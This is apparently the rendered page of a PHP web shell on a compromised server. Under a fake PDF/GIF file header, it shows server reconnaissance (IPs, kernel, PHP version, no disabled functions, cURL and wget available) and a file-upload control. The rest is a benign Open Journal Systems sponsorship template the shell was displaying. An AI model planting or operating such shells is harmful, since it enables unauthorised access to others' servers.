%PDF-1.7 GIF89;
| Server IP : 172.66.157.178 / Your IP : 172.16.20.3 Web Server : Apache/2.4.25 (Debian) System : Linux f64a392e70de 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64 User : application ( 1000) PHP Version : 5.6.40 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /app/plugins/themes/IntvJournal/templates/about/ |
Upload File : |
{**
* templates/about/journalSponsorship.tpl
*
* Copyright (c) 2003-2012 John Willinsky
* Distributed under the GNU GPL v2. For full terms see the file docs/COPYING.
*
* About the Journal / Journal Sponsorship.
*
*}
{strip}
{assign var="pageTitle" value="about.journalSponsorship"}
{include file="common/header.tpl"}
{/strip}
{if not(empty($publisherNote) && empty($publisherInstitution))}
<div id="publisher">
<h3 class="mycustom-background">{translate key="common.publisher"}</h3>
{if $publisherNote}<p>{$publisherNote|nl2br}</p>{/if}
<p><a href="{$publisherUrl}">{$publisherInstitution|escape}</a></p>
</div>
{/if}
{if not (empty($sponsorNote) && empty($sponsors))}
<div id="sponsors">
<h3 class="mycustom-background">{translate key="about.sponsors"}</h3>
{if $sponsorNote}<p>{$sponsorNote|nl2br}</p>{/if}
<ul>
{foreach from=$sponsors item=sponsor}
{if $sponsor.url}
<li><a href="{$sponsor.url|escape}">{$sponsor.institution|escape}</a></li>
{else}
<li>{$sponsor.institution|escape}</li>
{/if}
{/foreach}
</ul>
</div>
{/if}
{if !empty($contributorNote) || (!empty($contributors) && !empty($contributors[0].name))}
<div id="contributors">
<h3 class="mycustom-background">{translate key="about.contributors"}</h3>
{if $contributorNote}<p>{$contributorNote|nl2br}</p>{/if}
<ul>
{foreach from=$contributors item=contributor}
{if $contributor.name}
{if $contributor.url}
<li><a href="{$contributor.url|escape}">{$contributor.name|escape}</a></li>
{else}
<li>{$contributor.name|escape}</li>
{/if}
{/if}
{/foreach}
</ul>
</div>
{/if}
{include file="common/footer.tpl"}